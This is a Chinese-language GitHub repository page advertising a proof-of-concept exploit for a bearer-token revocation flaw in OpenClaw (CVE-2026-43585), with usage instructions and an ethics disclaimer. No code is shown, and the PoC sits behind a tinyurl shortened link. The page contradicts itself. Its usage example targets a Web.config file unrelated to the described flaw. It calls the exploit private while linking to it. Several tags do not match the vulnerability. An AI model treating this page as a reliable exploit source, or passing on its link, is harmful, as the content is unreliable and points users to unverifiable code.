ByteWraith1/CVE-2026-43585

GitHub: ByteWraith1/CVE-2026-43585

针对 OpenClaw 凭证轮换后bearer token未正确失效漏洞(CVE-2026-43585)的PoC利用脚本。

Stars: 0 | Forks: 0

# CVE-2026-43585 ### 概述 在 2026.4.15 版本之前,OpenClaw 未能在 SecretRef 轮换后正确处理 bearer token 身份验证。 ### 前置条件 - Python 3.8+ - 库:requests、argparse(通过 `pip install -r requirements.txt` 安装) ### 使用说明 - 安装依赖:`pip install -r requirements.txt` - 运行漏洞利用程序:`python exploit.py --target --file "/path/to/Web.config"` 详细信息 - CVE ID:CVE-2026-43585 - 发现时间:2026-04-15 - 发布时间:2026-05-6 - 漏洞利用可用性:未公开,仅限内部私有。 ### 工作原理 这一疏忽允许攻击者利用未在网关处正确失效的已撤销 token,从而导致未授权访问。系统在启动期间捕获并保留了过时的 bearer-auth 配置,从而产生了一个安全弱点,可以通过 HTTP 和 WebSocket 处理程序利用该弱点执行未授权操作。 ### 道德使用警告 - 此脚本是针对 CVE-2026-43585 的概念验证代码,仅用于教育和授权安全测试目的。 - **未经系统所有者明确许可,请勿在系统上使用此脚本。** - 滥用可能违反法律,包括美国的《计算机欺诈和滥用法》(CFAA) 或其他地区的类似法律。 - 在测试任何系统之前,请务必获得书面授权。 ### PoC 漏洞利用 - [链接](https://tinyurl.com/ydrjnkyp)
标签:Bearer Token, CISA项目, CVE-2026-43585, Modbus, OpenClaw, PoC, Python, SecretRef轮换, Web.config, WebSocket, 令牌窃取, 依赖分析, 安全测试, 攻击性安全, 数据展示, 无后门, 暴力破解, 未授权访问, 红队, 身份验证绕过, 逆向工具